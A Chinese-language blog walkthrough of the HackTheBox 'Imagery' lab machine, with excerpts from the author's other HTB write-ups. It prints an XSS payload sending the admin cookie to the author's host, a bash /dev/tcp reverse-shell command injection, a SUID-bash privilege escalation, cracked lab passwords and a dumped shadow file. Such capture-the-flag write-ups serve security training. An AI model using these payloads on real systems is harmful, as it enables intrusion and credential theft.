HTB-Imagery-WP
HTB-Imagery
扫描靶机
1 | nmap -A -v 10.10.11.88 |
就两个端口,有个8000端口可以访问,把imagery.htb放到host然后访问一下
进入后可以看到右上角个注册和登录按钮,先注册然后登陆进去
有个upload按钮,可以上传图片格式的文件,先尝试上传图片
在自己的图库里面可以看到刚刚上传的图片,并且可以下载删除,但是不能传送和修改图片,估计需要admin账号,查看一下登陆框有没有xss漏洞
看来啥也没有,看一下页面,可以发现最底下有个有个Report bug的按钮
这个是用来报告图库的bug使用
测试一下有没有xss漏洞,用bp抓包,可以看到有返回请求,不断的发请求
利用xss漏洞拿到admin的cookie
1 | <img src=1 onerror="document.location='http://10.10.14.24/cxk/'+ document.cookie"></img> |
成功的拿到了admin的cookie,然后将cookie写到后台,更新重新打开网站
可以看到有很多日志可以下载,使用bp抓包
可以看到下载成功了,将日志修改为系统文件路径看看是否能读取
可以找到一个LFI漏洞,利用该漏洞在home那里可以找到db文件
成功的拿到了一个admin账号,然后将这些哈希破解了
拿到了一个密码:iambatman,那是testuser的密码,登陆他的账号看看
可以看到这个用户拥有所有的功能,点三点那里,可以看到有个Transform传输功能
选择第一个剪切功能,然后会教你设置长宽高,然后直接抓包
使用bp抓包,在x坐标那里,可以输入命令
1 | /bin/bash -c \" /bin/bash -i 5<> /dev/tcp/10.10.14.121/4444 0<&5 1>&5 2>&5\ |
成功的拿到了shell,上传linpeass看看有没有可以提权的东西
可以看到在backup那里有个aes加密的文件,将其下载到本地,然后破解
可以看到在backup那里有个aes加密的文件,将其下载到本地,然后破解
成功破解了,然后密码是bestfriends,然后解压zip
里面有个db.json,打开后可以看到有个mark用户的,估计是ssh的账号,破解了哈希然后等
可以得知密码是supersmash,然后登陆ssh,发现是登陆不了的ssh,看来只能直接su
成功的拿到了user flag,输入sudo -l可以查看提权信息
通过charcol提权,输入—help查看一下命令参数信息
可以看到-R参数那个可以密码重置,重置的是charcol登陆,直接使用-R参数
可以看到密码已经重置了,直接使用shell命令,这样就进入了没密码模式
再次进去,输入help可以得知该终端的命令参数,直接输入命令提权
1 | auto add --schedule "* * * * *" --command "chmod +s /usr/bin/bash" --name "cxk" |
然后等一下就会autbot就会自动提权
成功拿到了root flag
1 | root:$y$j9T$OVSThp/6ybogilellugDf.$Le2uXxNfrXRiH18puL.GI7fnu2hYxttVASa.OMFvjs4:20286:0:99999:7:::daemon:*:20003:0:99999:7:::bin:*:20003:0:99999:7:::sys:*:20003:0:99999:7:::sync:*:20003:0:99999:7:::games:*:20003:0:99999:7:::man:*:20003:0:99999:7:::lp:*:20003:0:99999:7:::mail:*:20003:0:99999:7:::news:*:20003:0:99999:7:::uucp:*:20003:0:99999:7:::proxy:*:20003:0:99999:7:::www-data:*:20003:0:99999:7:::backup:*:20003:0:99999:7:::list:*:20003:0:99999:7:::irc:*:20003:0:99999:7:::_apt:*:20003:0:99999:7:::nobody:*:20003:0:99999:7:::systemd-network:!*:20003::::::usbmux:!:20003::::::systemd-timesync:!*:20003::::::messagebus:!:20003::::::systemd-resolve:!*:20003::::::pollinate:!:20003::::::polkitd:!*:20003::::::syslog:!:20003::::::uuidd:!:20003::::::tcpdump:!:20003::::::tss:!:20003::::::landscape:!:20003::::::fwupd-refresh:!*:20003::::::web:$y$j9T$bSJcB7IM6SVHob8SVJQ2X/$L16rTrWlInaJ6EvPTXO3CTiUP88xtNClzOJkwXIIL0D:20303:0:99999:7:::sshd:!:20283::::::snapd-range-524288-root:!:20283::::::snap_daemon:!:20283::::::mark:$y$j9T$m1reIJvzn7/7hhJ26v8WV1$3zPWU7HPsUn0P133BsMZDar.XmDq1T3AbJrfi.Nc6x3:20350:0:99999:7:::_laurel:!:20353:::::: |
过程中有参考大佬zorejt
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 BenD!
相关推荐
2024-08-20
HTB-Mailing-WP
拿到ip先端口扫描 然后再hosts里面加上网址 打开网页查看 对网站进行信息收集,发现参数 是一个下载的参数,看看能不能找到漏洞,抓包测试 发现目录遍历漏洞,信息收集后发现这个网站是一个hmailserver的邮件系统,直接去网上找一下这个服务的安装说明和安装的配置文件位置 找到密码,找一个网站解一下md5 https://hashes.com/zh/decrypt/hash 得到账号和密码后直接登录telent发现什么都没有 信息收集找漏洞,发现有一个RCE漏洞 github:https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability 大概意思就是发送一个虚拟的文件,这个虚拟的文件可以获取到Windows的NTML(Windows的密码加密方式) python3 CVE-2024-21413.py –server mailing.htb –port 587 –username administrator@mailing.h...
2024-09-23
HTB-Usage-WP
先添加hosts 然后访问网页 目录扫描得到 admin.usage.htb子域名 在hosts中添加,然后查看 弱密码进不去,重新找洞, 可以根据框架寻找漏洞 注册账号看看 没事用,就是博客 漏洞暂时不知道版本,先不测试,继续找找输入框,看看有没有sql漏洞 忘记密码地方可以输入邮箱,测试发现有小问题,直接拉到sqlmap中跑 拉到本地,级别调最高进行测试 成功扫到库.进入博客库中查看admin密码 复制出来使用john爆破或者是hashcat爆破 hashid 查看加密方式 在hashcat中找到对应的代码 获取到正确密码 登录admin用户 没有如何有用信息,发现头像可以换,直接上传木马 编写木马 测试 但是有一个问题,马好像只能存在一分钟(甚至更短)所以上传成功后立马写shell弹到权限 尽量使用python吧 利用python升级成交互式shell root.txt在网站根目录下 大致思路是 先能登录dash用户 然后想办法登录另外一个用户(因为另外一个用户sudo中可以运行一个脚本) 然后想办法登录root 目前我们通过s...
2024-08-20
HTB-SolarLab-WP
现在hosts中添加 然后使用nmap进行扫描 开了smb服务和http,访问网页 一个倒计时网页,没啥用 回头看看smb服务能不能免密访问 可以空密码登录,并且有两个共享文件夹,查看文件夹内容 发现有几个文件夹,还有表格,先下载下来 发现了账号和密码,先记下来,在对网页进行信息收集 没有多余的网页,也没后台,感觉有问题,重新扫描端口,看看是不是藏了大端口,我最开始的nmap扫描只能扫描常见端口 猜想是对的,确实藏了一个端口(因为最开始我们在表格中获取到了passwd,肯定可以用得到),访问的时候会显示出错,需要把这个也加进hosts中 发现登录页面 结合最开始的那个表格,进行爆破,即可爆破出账号和密码 发现三个长度不一样的,尝试登录看看 第三个可以登录 试了一下全部报错沟八用没有,看样子只能找漏洞了 有洞!!!!! 这个漏洞的大概意思就是可以将html的代码自动识别到系统的python中进行运行,从而获得RCE,下面进行具体操作 shell编写 获得权限 获得user 下面肯定就是提权了,查看端口,发现开了两个端口,但是我们现在没办...
2026-01-03
HTB-Rustykey-WP
HTB-Rustykey条件:rr.parker / 8#t5HE8L!W3A 扫描靶机 1nmap -A -v -T4 10.10.11.75 得到了rustykey.htb域名,写到hosts里面,使用ldap协议获得UPN信息(userPrincipalName) 将ldap里面的Users表单导出做成用户表,然后使用bh导出内网环境 1bloodhound-python -u rr.parker -p '8#t5HE8L!W3A' -d rustykey.htb -ns 10.10.11.75 -c All --zip 可以看到HELPDESK组对T-COMPUTER3.RUSTYKEY.HTB主机有Addself作用 说明这个主机可以添加到这个组里面 然后查看一下HELPDESK组,可以修改这4个用户的密码,分别是 1234BB.MORGANGG.ANDERSONDD.ALIEE.REED 除了可以修改这四个用户的密码,还对PROTECTED OBJECTS这个组有AddMember的属性 然后继续分析其他的关系,在H...
2024-08-19
HTB-MagicGardens-WP(部分)
使用nmap对ip扫描发现域名,放进hosts中去访问80,还有5000存在docker 打开网站发现是一个卖花的 没什么可用信息,扫一下网站目录 有一个admin,访问查看 存在一个注册页面,查了一下有这个cms,但是具体版本没办法找到,所以先放一放 注册一个账号登录网页看看有没有信息,因为这是个卖花的,所以买一朵花看看 大概意思就是购买成功了,出示二维码可以折扣,我们找一下二维码 找了半天,发现在右上角 进入之后发现有三种卡可以升级 但是我升级的时候发现三张卡是不同的域名,鼠标悬停就可以显示 抓包看一下参数 bank是显示域名,将bank改成本地的IP地址,再用python搭建一个局域网看看有没有访问记录 有回显但是501报错了,用别的方法试一下api 没找到这个域名,那就把这个加进hosts中 这个报错是405,说明请求方式不对,那就改成POST请求 请求方式对了,但是缺少参数,或者是格式有问题,再进行修改,将POST参数加进去 把参数加进去之后回显了402报错,具体报错信息我查了,感觉 到这里我没思路了,大概就是需要触发条件,借鉴了一下...
